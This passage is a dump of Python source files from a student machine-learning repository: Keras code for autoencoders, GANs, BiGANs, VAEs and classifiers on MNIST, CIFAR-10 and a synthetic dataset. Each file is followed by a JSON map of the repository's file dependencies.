"/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,481 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_visualize.py | import numpy as np
from keras import backend as K
from keras.datasets import mnist
from mnist_conv_ae_models import encoder_model, decoder_model
import matplotlib.pyplot as plt
# Load saved models for encoder and decoder
e = encoder_model()
e.load_weights('encoder.h5')
#e.load_weights('mnist_encoder.h5')
d = decoder_model()
d.load_weights('decoder.h5')
#d.load_weights('mnist_decoder.h5')
# Get weights from first layer of encoder
weights0 = e.layers[0].get_weights()[0] # get weights
#weights0 = e.layers[0].get_weights()[1] # get biases
weights0 = np.array(weights0).transpose() # transpose into suitable shape for visualizing
# Load and format data
(x_train, _), (x_test, _) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
# Define function for mapping of first layer of encoder
layer_1_out = K.function([e.layers[0].input, K.learning_phase()],[e.layers[0].output])
# Get activation maps for first 10 images in test set
x_test = x_test[0:9,:,:,:]
recon_test = d.predict(e.predict(x_test))
img_num = 1 # choose image number
layer_1_activations = layer_1_out([x_test, 1])[0]
layer_1_activations = layer_1_activations[img_num].transpose() # transpose into shape suitable for plotting
# Visualization
# Display digit from test set along with the encoders filters and the activation map of this filter for each image
n = len(weights0)
plt.figure(figsize=(20,20))
# Plot test digit
ax = plt.subplot(3, n, 1)
plt.imshow(x_test[img_num].reshape(28,28))
plt.gray()
plt.title('Test Set Digit')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Plot reconstructed test digit
ax = plt.subplot(3, n, n)
plt.imshow(recon_test[img_num].reshape(28,28))
plt.gray()
plt.title('Reconstructed Digit')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
for i in range(n):
# Display layer 1 features
ax = plt.subplot(3, n, i + 1 + n)
plt.imshow(weights0[i].reshape(3, 3))
plt.gray()
plt.title('Filter ' + str(i+1))
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Display layer 1 activation map
ax = plt.subplot(3, n, i + 1 + 2*n)
plt.imshow(layer_1_activations[i].transpose())
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Give title to third row of images
plt.subplot(3, n, 1 + 1 + 2*n)
plt.title('Activation map of each filter')
plt.gray()
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,482 | davidhayes3/ME-Project | refs/heads/master | /common_models/common_models.py | from keras.layers import Input, Lambda
from keras.models import Sequential, Model
from keras import backend as K
def bigan_model(generator, encoder, discriminator, latent_dim, img_shape):
z = Input(shape=(latent_dim,))
x = Input(shape=img_shape)
x_ = generator(z)
z_ = encoder(x)
fake = discriminator([z, x_])
valid = discriminator([z_, x])
return Model([z, x], [fake, valid])
def gan_model(generator, discriminator):
model = Sequential()
model.add(generator)
model.add(discriminator)
return model
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def aae_model(encoder, decoder, discriminator, img_shape):
x = Input(shape=img_shape)
enc_x = encoder(x)
recon_x = decoder(enc_x)
validity = discriminator(enc_x)
return Model(x, [recon_x, validity])
def latent_reconstructor_model(d, e):
model = Sequential()
model.add(d)
model.add(e)
return model
def vae_encoder_sampling_model(encoder, latent_dim, img_shape, epsilon_std):
x = Input(shape=img_shape)
# Define sampling function
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
return Model(x, z)
def vae_model(vae_encoder_sample, generator, img_shape):
x = Input(shape=img_shape)
z = vae_encoder_sample(x)
recon_x = generator(z)
return Model(x, recon_x) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,483 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_models.py | from keras.models import Sequential, Model
from keras.layers import Dense, Activation, Input, LeakyReLU, Dropout, concatenate, BatchNormalization, Lambda, Flatten, Reshape
from keras.regularizers import l1
import keras.backend as K
import numpy as np
# =====================================
# Define constants
# =====================================
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
# =====================================
# Define models
# =====================================
def encoder_model():
model = Sequential()
model.add(Flatten(input_shape=img_shape))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(latent_dim))
return model
def sparse_encoder_model():
model = Sequential()
model.add(Flatten(input_shape=img_shape))
model.add(Dense(512, activity_regularizer=l1(10e-5)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512, activity_regularizer=l1(10e-5)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(latent_dim))
return model
def vae_encoder_model():
x = Input(shape=img_shape)
x_enc = Flatten()(x)
x_enc = Dense(512)(x_enc)
x_enc = LeakyReLU(alpha=0.2)(x_enc)
x_enc = BatchNormalization(momentum=0.8)(x_enc)
x_enc = Dense(512)(x_enc)
x_enc = LeakyReLU(alpha=0.2)(x_enc)
x_enc = BatchNormalization(momentum=0.8)(x_enc)
z_mean = Dense(latent_dim)(x_enc)
z_log_var = Dense(latent_dim)(x_enc)
return Model(x, [z_mean, z_log_var])
def generator_model(gan=False):
model = Sequential()
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(np.prod(img_shape)))
model.add(Reshape(img_shape))
if gan is False:
model.add(Activation('sigmoid'))
if gan is not False:
model.add(Activation('tanh'))
return model
def bigan_discriminator_model():
z_in = Input(shape=(latent_dim,))
z = Dense(512)(z_in)
z = LeakyReLU(alpha=0.2)(z)
z = Dropout(0.5)(z)
z = Dense(512)(z)
z = LeakyReLU(alpha=0.2)(z)
x_in = Input(shape=img_shape)
x = Flatten()(x_in)
x = Dense(512)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.5)(x)
x = Dense(512)(x)
x = LeakyReLU(alpha=0.2)(x)
c = concatenate([z, x])
c = Dropout(0.5)(c)
c = Dense(1024)(c)
c = LeakyReLU(alpha=0.2)(c)
c = Dropout(0.5)(c)
c = Dense(1)(c)
validity = Activation('sigmoid')(c)
return Model([z_in, x_in], validity)
def gan_discriminator_model():
model = Sequential()
model.add(Flatten(input_shape=img_shape))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(1024))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
return model
def aae_discriminator_model():
model = Sequential()
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(1024))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
return model
def bigan_model(generator, encoder, discriminator):
z = Input(shape=(latent_dim,))
x = Input(shape=(np.prod(img_shape),))
x_ = generator(z)
z_ = encoder(x)
fake = discriminator([z, x_])
valid = discriminator([z_, x])
return Model([z, x], [fake, valid])
def gan_model(generator, discriminator):
model = Sequential()
model.add(generator)
model.add(discriminator)
return model
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def aae_model(encoder, decoder, discriminator):
x = Input(shape=(np.prod(img_shape),))
enc_x = encoder(x)
recon_x = decoder(enc_x)
validity = discriminator(enc_x)
return Model(x, [recon_x, validity])
def latent_reconstructor_model(d, e):
model = Sequential()
model.add(d)
model.add(e)
return model
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=1.0)
return z_mean + K.exp(z_log_var / 2) * epsilon
def vae_model(encoder, generator):
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling)([z_mean, z_log_var])
recon_x = generator(z)
return Model(x, recon_x)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,484 | davidhayes3/ME-Project | refs/heads/master | /common_models/classifier_models.py | from keras.models import Sequential
from keras.layers import Flatten, Dense, Dropout, Activation
def classifier_e_frozen_model(encoder):
model = Sequential()
encoder.trainable = False
model.add(encoder)
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(10))
model.add(Activation('softmax'))
return model
def classifier_e_trainable_model(encoder):
model = Sequential()
model.add(encoder)
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(10))
model.add(Activation('softmax'))
return model
def mnist_classifier_e_trainable_model(encoder):
model = Sequential()
model.add(encoder)
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
return model
def mnist_classifier_e_frozen_model(encoder):
model = Sequential()
encoder.trainable = False
model.add(encoder)
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
return model | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,485 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_gan_test.py | from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Reshape
from keras.layers.core import Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import UpSampling2D
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers.core import Flatten
from keras.optimizers import SGD
from keras.datasets import mnist
import numpy as np
from PIL import Image
import argparse
import math
import coremltools
import os
import matplotlib.pyplot as plt
def generator_model():
model = Sequential()
model.add(Dense(input_dim=100, units=1024))
model.add(Activation('tanh'))
model.add(Dense(128 * 7 * 7))
model.add(BatchNormalization())
model.add(Activation('tanh'))
model.add(Reshape((7, 7, 128), input_shape=(128 * 7 * 7,)))
model.add(UpSampling2D(size=(2, 2)))
model.add(Conv2D(64, (5, 5), padding='same'))
model.add(Activation('tanh'))
model.add(UpSampling2D(size=(2, 2)))
model.add(Conv2D(1, (5, 5), padding='same'))
model.add(Activation('tanh'))
return model
def discriminator_model():
model = Sequential()
model.add(Conv2D(64, (5, 5), padding='same', input_shape=(28, 28, 1)))
model.add(Activation('tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (5, 5)))
model.add(Activation('tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1024))
model.add(Activation('tanh'))
model.add(Dense(1))
model.add(Activation('sigmoid'))
return model
def generator_containing_discriminator(g, d):
model = Sequential()
model.add(g)
d.trainable = False
model.add(d)
return model
def generate(batch_size, nice=False):
g = generator_model()
g.compile(loss='binary_crossentropy', optimizer="SGD")
g.load_weights('generator.h5')
if nice:
d = discriminator_model()
d.compile(loss='binary_crossentropy', optimizer="SGD")
d.load_weights('discriminator.h5')
noise = np.random.uniform(-1, 1, (batch_size * 20, 100))
generated_images = g.predict(noise, verbose=1)
d_pret = d.predict(generated_images, verbose=1)
index = np.arange(0, batch_size * 20)
index.resize((batch_size * 20, 1))
pre_with_index = list(np.append(d_pret, index, axis=1))
pre_with_index.sort(key=lambda x: x[0], reverse=True)
nice_images = np.zeros((batch_size,) + generated_images.shape[1:3], dtype=np.float32)
nice_images = nice_images[:, :, :, None]
for i in range(batch_size):
idx = int(pre_with_index[i][1])
nice_images[i, :, :, 0] = generated_images[idx, :, :, 0]
image = combine_images(nice_images)
else:
noise = np.random.uniform(-1, 1, (batch_size, 100))
generated_images = g.predict(noise, verbose=1)
image = combine_images(generated_images)
image = image * 127.5 + 127.5
Image.fromarray(image.astype(np.uint8)).save(
"generated_image.png")
def combine_images(generated_images):
num = generated_images.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = generated_images.shape[1:3]
image = np.zeros((height * shape[0], width * shape[1]),
dtype=generated_images.dtype)
for index, img in enumerate(generated_images):
i = int(index / width)
j = index % width
image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1]] = \
img[:, :, 0]
return image
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = X_train[:, :, :, None]
X_test = X_test[:, :, :, None]
d = discriminator_model()
g = generator_model()
d_on_g = generator_containing_discriminator(g, d)
d_optim = SGD(lr=0.0005, momentum=0.9, nesterov=True)
g_optim = SGD(lr=0.0005, momentum=0.9, nesterov=True)
g.compile(loss='binary_crossentropy', optimizer="SGD")
d_on_g.compile(loss='binary_crossentropy', optimizer=g_optim)
d.trainable = True
d.compile(loss='binary_crossentropy', optimizer=d_optim, metrics=['accuracy'])
epochs = 100
batch_size = 128
# Define arrays to hold progression of discriminator and bigan losses
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
num_batches = int(X_train.shape[0] / batch_size)
for epoch in range(epochs):
print("Epoch is", epoch)
print("Number of batches", int(X_train.shape[0] / batch_size))
g_epoch_loss = 0
d_epoch_loss = 0
d_acc = 0
for index in range(num_batches):
noise = np.random.uniform(-1, 1, size=(batch_size, 100))
image_batch = X_train[index * batch_size:(index + 1) * batch_size]
generated_images = g.predict(noise, verbose=0)
if index % 20 == 0:
image = combine_images(generated_images)
image = image * 127.5 + 127.5
Image.fromarray(image.astype(np.uint8)).save("Images/" + str(epoch) + "_" + str(index) + ".png")
X = np.concatenate((image_batch, generated_images))
y = [1] * batch_size + [0] * batch_size
d_loss = d.train_on_batch(X, y)
d_epoch_loss += d_loss[0]
d_acc += d_loss[1]
noise = np.random.uniform(-1, 1, (batch_size, 100))
#noise = np.random.lognormal(mean=0, sigma=1, size=(batch_size, 100))
d.trainable = False
g_loss = d_on_g.train_on_batch(noise, [1] * batch_size)
d.trainable = True
g_epoch_loss += g_loss
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, index, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss))
if index % 10 == 9:
g.save_weights('generator.h5', True)
d.save_weights('discriminator.h5', True)
# Record epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# Plot epoch loss curves
plt.figure()
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_epoch_loss_trajectory, 'b-', epoch_numbers, g_epoch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Epoch Number')
plt.ylabel('Average Minibatch Loss')
plt.savefig('Images/mnist_gan_epochloss.png')
# Plot discriminator accuracy over epochs
plt.figure()
plt.plot(epoch_numbers, d_acc_trajectory)
plt.xlabel('Epoch Number')
plt.ylabel('Accuracy')
plt.savefig('Images/mnist_gan_discriminator_acc.png')
